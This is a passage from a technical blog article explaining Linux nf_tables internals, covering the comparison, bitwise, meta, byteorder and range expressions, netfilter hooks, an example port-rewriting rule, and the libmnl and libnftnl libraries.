<h3 id="nft_cmp_expr-">nft_cmp_expr <a name="nft_cmp_expr"></a></h3>
<p>We are going to take a look at the comparison expression. It can be used to control the flow of the execution of expressions depending on if a condition is met.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_cmp_expr</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_cmp_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first parameter we have here is <code class="language-plaintext highlighter-rouge">data</code>. This is the constant data against which we are going to be comparing. So one of our arguments in the comparison is always constant. The other is defined by <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code>.</p>

<p>Now we have to take a look at the type of relational operators.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_cmp_ops - nf_tables relational operator
 *
 * @NFT_CMP_EQ: equal
 * @NFT_CMP_NEQ: not equal
 * @NFT_CMP_LT: less than
 * @NFT_CMP_LTE: less than or equal to
 * @NFT_CMP_GT: greater than
 * @NFT_CMP_GTE: greater than or equal to
 */</span>
<span class="k">enum</span> <span class="n">nft_cmp_ops</span> <span class="p">{</span>
	<span class="n">NFT_CMP_EQ</span><span class="p">,</span>
	<span class="n">NFT_CMP_NEQ</span><span class="p">,</span>
	<span class="n">NFT_CMP_LT</span><span class="p">,</span>
	<span class="n">NFT_CMP_LTE</span><span class="p">,</span>
	<span class="n">NFT_CMP_GT</span><span class="p">,</span>
	<span class="n">NFT_CMP_GTE</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>For example if we choose <code class="language-plaintext highlighter-rouge">NFT_CMP_LT</code> the comparison is going to be <code class="language-plaintext highlighter-rouge">register &lt; data</code> where register is the data we get from <code class="language-plaintext highlighter-rouge">sreg</code> (with length <code class="language-plaintext highlighter-rouge">len</code>) and data is the constant data that we are providing to the expression.</p>

<p>But what happens if the comparison evaluates to true and what happens if it evaluates to false?
If it evalutes to true execution continues normally down the expressions in the current rule.
If it evaluates to false it sets the verdict code to <code class="language-plaintext highlighter-rouge">NFT_BREAK</code> which means that no more expressions will be executed in the current rule but then it would continue down normally down the rest of the rules in the chain.</p>

<h3 id="nft_bitwise-">nft_bitwise <a name="nft_bitwise"></a></h3>
<p>Now we are going to take a look at an expression that performs bitwise operations on the registers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_bitwise</span> <span class="p">{</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_bitwise_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">mask</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">xor</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first obvious parameters are <code class="language-plaintext highlighter-rouge">sreg</code>, <code class="language-plaintext highlighter-rouge">dreg</code> and <code class="language-plaintext highlighter-rouge">len</code>. The parameters <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code> define on what registers we are going to be performing the operation on and <code class="language-plaintext highlighter-rouge">dreg</code> defines where the data is going to be put after the bitwise operation has been performed.</p>

<p>Now it is time to take a look at the different bitwise operations.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_bitwise_ops - nf_tables bitwise operations
 *
 * @NFT_BITWISE_BOOL: mask-and-xor operation used to implement NOT, AND, OR and
 *                    XOR boolean operations
 * @NFT_BITWISE_LSHIFT: left-shift operation
 * @NFT_BITWISE_RSHIFT: right-shift operation
 */</span>
<span class="k">enum</span> <span class="n">nft_bitwise_ops</span> <span class="p">{</span>
	<span class="n">NFT_BITWISE_BOOL</span><span class="p">,</span>
	<span class="n">NFT_BITWISE_LSHIFT</span><span class="p">,</span>
	<span class="n">NFT_BITWISE_RSHIFT</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The parameters <code class="language-plaintext highlighter-rouge">mask</code> and <code class="language-plaintext highlighter-rouge">xor</code> can be set if the operation is <code class="language-plaintext highlighter-rouge">NFT_BITWISE_BOOL</code> when we want perform a boolean operation. The <code class="language-plaintext highlighter-rouge">data</code> parameter has to be set if the operation is <code class="language-plaintext highlighter-rouge">NFT_BITWISE_LSHIFT</code> or <code class="language-plaintext highlighter-rouge">NFT_BITWISE_RSHIFT</code>. The <code class="language-plaintext highlighter-rouge">data</code> parameter is set to the amount we want to shift by.</p>

<h3 id="nft_meta-">nft_meta <a name="nft_meta"></a></h3>
<p>This expression allows you to play around with packet metadata.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_meta</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_meta_keys</span>	<span class="n">key</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u8</span>		<span class="n">dreg</span><span class="p">;</span>
		<span class="n">u8</span>		<span class="n">sreg</span><span class="p">;</span>
	<span class="p">};</span>
<span class="p">};</span>
</code></pre></div></div>
<p>As you can see it can be used in two ways. The first one is to get the metadata from the packet and write it into the registers - when <code class="language-plaintext highlighter-rouge">dreg</code> is used. The other way to use it is to get metadata from the registers and write it to the packet - when <code class="language-plaintext highlighter-rouge">sreg</code> is used.
What metadata is going to be maniupulated depends on the <code class="language-plaintext highlighter-rouge">key</code> being used.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_meta_keys - nf_tables meta expression keys
 *
 * @NFT_META_LEN: packet length (skb-&gt;len)
 * @NFT_META_PROTOCOL: packet ethertype protocol (skb-&gt;protocol), invalid in OUTPUT
 * @NFT_META_PRIORITY: packet priority (skb-&gt;priority)
 * @NFT_META_MARK: packet mark (skb-&gt;mark)
 * @NFT_META_IIF: packet input interface index (dev-&gt;ifindex)
 * @NFT_META_OIF: packet output interface index (dev-&gt;ifindex)
 * @NFT_META_IIFNAME: packet input interface name (dev-&gt;name)
 * @NFT_META_OIFNAME: packet output interface name (dev-&gt;name)
 * @NFT_META_IIFTYPE: packet input interface type (dev-&gt;type)
 * @NFT_META_OIFTYPE: packet output interface type (dev-&gt;type)
 * @NFT_META_SKUID: originating socket UID (fsuid)
 * @NFT_META_SKGID: originating socket GID (fsgid)
 * @NFT_META_NFTRACE: packet nftrace bit
 * @NFT_META_RTCLASSID: realm value of packet's route (skb-&gt;dst-&gt;tclassid)
 * @NFT_META_SECMARK: packet secmark (skb-&gt;secmark)
 * @NFT_META_NFPROTO: netfilter protocol
 * @NFT_META_L4PROTO: layer 4 protocol number
 * @NFT_META_BRI_IIFNAME: packet input bridge interface name
 * @NFT_META_BRI_OIFNAME: packet output bridge interface name
 * @NFT_META_PKTTYPE: packet type (skb-&gt;pkt_type), special handling for loopback
 * @NFT_META_CPU: cpu id through smp_processor_id()
 * @NFT_META_IIFGROUP: packet input interface group
 * @NFT_META_OIFGROUP: packet output interface group
 * @NFT_META_CGROUP: socket control group (skb-&gt;sk-&gt;sk_classid)
 * @NFT_META_PRANDOM: a 32bit pseudo-random number
 * @NFT_META_SECPATH: boolean, secpath_exists (!!skb-&gt;sp)
 * @NFT_META_IIFKIND: packet input interface kind name (dev-&gt;rtnl_link_ops-&gt;kind)
 * @NFT_META_OIFKIND: packet output interface kind name (dev-&gt;rtnl_link_ops-&gt;kind)
 * @NFT_META_BRI_IIFPVID: packet input bridge port pvid
 * @NFT_META_BRI_IIFVPROTO: packet input bridge vlan proto
 * @NFT_META_TIME_NS: time since epoch (in nanoseconds)
 * @NFT_META_TIME_DAY: day of week (from 0 = Sunday to 6 = Saturday)
 * @NFT_META_TIME_HOUR: hour of day (in seconds)
 * @NFT_META_SDIF: slave device interface index
 * @NFT_META_SDIFNAME: slave device interface name
 */</span>
</code></pre></div></div>
<p>The meta keys are… a lot.</p>

<h3 id="nft_byteorder-">nft_byteorder <a name="nft_byteorder"></a></h3>
<p>We will now look at a type of expression that can be used to change the endianness of data.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_byteorder</span> <span class="p">{</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_byteorder_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">size</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The essential parameters are <code class="language-plaintext highlighter-rouge">sreg</code>, <code class="language-plaintext highlighter-rouge">len</code> and <code class="language-plaintext highlighter-rouge">dreg</code> that show from what register we get the data that we are going to perform the action on, how big it is and where we are going to put it.
There is an operation parameter <code class="language-plaintext highlighter-rouge">op</code> that can hold two values.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_byteorder_ops - nf_tables byteorder operators
 *
 * @NFT_BYTEORDER_NTOH: network to host operator
 * @NFT_BYTEORDER_HTON: host to network operator
 */</span>
<span class="k">enum</span> <span class="n">nft_byteorder_ops</span> <span class="p">{</span>
	<span class="n">NFT_BYTEORDER_NTOH</span><span class="p">,</span>
	<span class="n">NFT_BYTEORDER_HTON</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first type of operation is <strong>network to host</strong> where we convert from network endianness (almost always big-endian) to host endianness - whatever that might be (little-endian on the 8086 family).
The other type of operation is <strong>host to network</strong> which is the opposite - converts from host endianness to network.</p>

<p>The last parameter is <code class="language-plaintext highlighter-rouge">size</code>. This is the size of the <strong>integers</strong> where the endianness will be changed. It can take a few discrete values - 2, 4 and 8.</p>

<h3 id="nft_range_expr-">nft_range_expr <a name="nft_range_expr"></a></h3>

<p>This expression is similiar to the compare expression but instead of comparing against a constant value it compares against a constant range.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_range_expr</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data_from</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data_to</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_range_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The range is defined by <code class="language-plaintext highlighter-rouge">data_from</code> and <code class="language-plaintext highlighter-rouge">data_to</code>. The parameters <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code> define the data we are going to be comparing against the range.
The range is inclusive - including the values passed as <code class="language-plaintext highlighter-rouge">data_from</code> and <code class="language-plaintext highlighter-rouge">data_to</code>.
The last parameter is the operation <code class="language-plaintext highlighter-rouge">op</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_range_ops - nf_tables range operator
 *
 * @NFT_RANGE_EQ: equal
 * @NFT_RANGE_NEQ: not equal
 */</span>
<span class="k">enum</span> <span class="n">nft_range_ops</span> <span class="p">{</span>
	<span class="n">NFT_RANGE_EQ</span><span class="p">,</span>
	<span class="n">NFT_RANGE_NEQ</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>If the operation is <code class="language-plaintext highlighter-rouge">NFT_RANGE_EQ</code> means that if the data is outside of the range the verdict will be set to <code class="language-plaintext highlighter-rouge">NFT_BREAK</code> - meaning that the rest of the expressions in the rule will be skipped and it will continue down the rules in the chain after that. If the operation is <code class="language-plaintext highlighter-rouge">NFT_RANGE_NEQ</code> it will set the verdict to <code class="language-plaintext highlighter-rouge">NFT_BREAK</code> if the data is inside the (inclusive) range.</p>

<h3 id="other-expressions-">Other expressions <a name="otherexpr"></a></h3>
<p>Those are a few of the most commonly used expressions in nf_tables but there are others.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/net/netfilter/nf_tables_core.h */</span> 
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_counter_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_lookup_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_dynset_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_rt_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_exthdr_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_last_type</span><span class="p">;</span>
<span class="c1">// the ones we talked about are omitted  </span>
</code></pre></div></div>

<h3 id="an-example-">An example <a name="example"></a></h3>
<p>I want to give a quick example of a simple rule and how different expressions might take a part in it.</p>

<p>We are going to make a rule that checks if a UDP packet’s destination port is in the range <code class="language-plaintext highlighter-rouge">50001-50009</code> and if so changes the destination port to <code class="language-plaintext highlighter-rouge">1337</code>.</p>

<table>
  <thead>
    <tr>
      <th>Expression</th>
      <th>Expression Arguments</th>
      <th>Result of expression</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>nft_payload</td>
      <td>base = NFT_PAYLOAD_TRANSPORT_HEADER<br />offset = 2<br />len = 2<br />dreg = NFT_REG32_01</td>
      <td>Copies the destination port from the UDP header that is 2 bytes long and is at offset 2 from the start of the UDP header and puts it in 1st register</td>
    </tr>
    <tr>
      <td>nft_range_expr</td>
      <td>data_from = (u16) 50001<br />data_to = (u16) 50009<br />sreg = NFT_REG32_01<br />len = 2<br />op = NFT_RANGE_EQ</td>
      <td>Checks if the destination port in the 1st register is in the range 50001-50009<br />If it isn’t it will set the verdict to NFT_BREAK - skipping the rest of the expressions in the rule<br />If it is in the range it will continue down the expressions</td>
    </tr>
    <tr>
      <td>nft_immediate_expr</td>
      <td>data = (u16) 1337<br />dreg = NFT_REG32_02<br />len = 2</td>
      <td>Sets the 2nd register to 1337.</td>
    </tr>
    <tr>
      <td>nft_payload_set</td>
      <td>base = NFT_PAYLOAD_TRANSPORT_HEADER<br />offset = 2<br />len = 2<br />sreg = NFT_REG_02</td>
      <td>Changes the destination port to the value in the 2nd register (1337).</td>
    </tr>
  </tbody>
</table>

<p>However we would ultimately want this rule to be triggered only if the packet is incoming… How do we do that?</p>

<p>This is determined by what hook the chain (where the rule is) uses. So let us take a look at the hooks.</p>

<h2 id="the-hooks-">The Hooks <a name="hooks"></a></h2>
<p>The netfilter hooks define at what point a chain is going to be executed. Is it goint to be when a packet comes into the network? Or is it going to be on its way out?</p>

<p>There are six hooks - ingress, prerouting, input, forward, output, postrouting.
The <em>prerouting</em> and <em>input</em> hooks are triggered by traffic flowing into the network (or the local machine).
The <em>postrouting</em> and <em>output</em> are triggered by traffic flowing out of the network.
If <strong>IP forwarding</strong> is enabled so your machine can act as a router then the <strong>forward</strong> hook could also be reached after <em>prerouting</em>.</p>

<p>The last hook is the <strong>ingress hook</strong>. It is newer than the others (introduced in version 4.2).</p>

<p>The <strong>ingress hook</strong> is attached to a particular network interface. It can be used to enforce <strong>very</strong> early filtering policies. The ingress hook would be triggered even before the prerouting one. An important thing that has to be mentioned is - at the stage where this hook resides - the fragmented diagrams have not been reassembled.</p>

<p>So to summarize the possible ways a packet can take are:</p>
<ul>
  <li>ingress -&gt; prerouting -&gt; input -&gt; <em>application</em></li>
  <li><em>application</em> -&gt; output -&gt; postrouting</li>
</ul>

<p>And if forwarding is enabled the ways a packet can take also includes:</p>
<ul>
  <li>ingress -&gt; prerouting -&gt; forward -&gt; postrouting</li>
</ul>

<p>On the <code class="language-plaintext highlighter-rouge">nftables</code> wiki a schematic can be found that simplifies stuff a bit.</p>

<p><img src="https://people.netfilter.org/pablo/nf-hooks.png" alt="nftables schematic" /></p>

<p>In the codebase the hooks are defined in the following <code class="language-plaintext highlighter-rouge">enum</code> type.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/uapi/linux/netfilter.h */</span> 

<span class="k">enum</span> <span class="n">nf_inet_hooks</span> <span class="p">{</span>
	<span class="n">NF_INET_PRE_ROUTING</span><span class="p">,</span>
	<span class="n">NF_INET_LOCAL_IN</span><span class="p">,</span>
	<span class="n">NF_INET_FORWARD</span><span class="p">,</span>
	<span class="n">NF_INET_LOCAL_OUT</span><span class="p">,</span>
	<span class="n">NF_INET_POST_ROUTING</span><span class="p">,</span>
	<span class="n">NF_INET_NUMHOOKS</span><span class="p">,</span>
	<span class="n">NF_INET_INGRESS</span> <span class="o">=</span> <span class="n">NF_INET_NUMHOOKS</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<h2 id="the-libraries---libmnl-and-libnftnl-">The Libraries - libmnl and libnftnl <a name="libraries"></a></h2>
<p>It is time to take a very quick look at the two libraries that significantly simplify the process of working with nf_tables.</p>

<h3 id="libmnl-">libmnl <a name="libmnl"></a></h3>
<blockquote>
  <p>libmnl is a minimalistic user-space library oriented to Netlink developers. There are a lot of common tasks in parsing, validating, constructing of both the Netlink header and TLVs that are repetitive and easy to get wrong. This library aims to provide simple helpers that allows you to re-use code and to avoid re-inventing the wheel.</p>
</blockquote>

<p>This is the description provided in the documentation. In the <a href="https://git.netfilter.org/libmnl/">libmnl repository</a> you wil find some examples on the use of the library. While not well documented it could be understood to a degree through those examples.</p>

<h3 id="libnftnl-">libnftnl <a name="libnftnl"></a></h3>
<p>This is a userspace library that essentially provides an API to nf_tables. It is crucial when working with nf_tables. It requires libmnl to function.</p>

<p>In the <a href="https://git.netfilter.org/libnftnl/">libnftnl repository</a> you can find <strong>a lot</strong> of good examples showing you how to use the library. They are more than enough to give you a solid understanding.</p>

<p>In <a href="https://git.netfilter.org/libnftnl/tree/include/linux/netfilter/nf_tables.h">include/linux/netfilter/nf_tables.h</a> in the repository you can find all of the parameter names (and enum values) for all of the expressions. This file is <code class="language-plaintext highlighter-rouge">include/uapi/linux/netfilter/nf_tables.h</code> from the kernel tree.</p>

<h2 id="closing-remarks-">Closing remarks <a name="closing"></a></h2>
<p>Ultimately I hope this article can provide you with a solid understanding of nf_tables. I hope I saved some people precious hours that they would otherwise pour into researching nf_tables.</p>

<p>Credit to <a href="https://twitter.com/pqlqpql">David Bouman</a> for his <a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/">write up</a> that gave me the base knowledge that I needed to take a deeper look and ultimately write this article.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Introduction Hello there!]]></summary></entry></feed>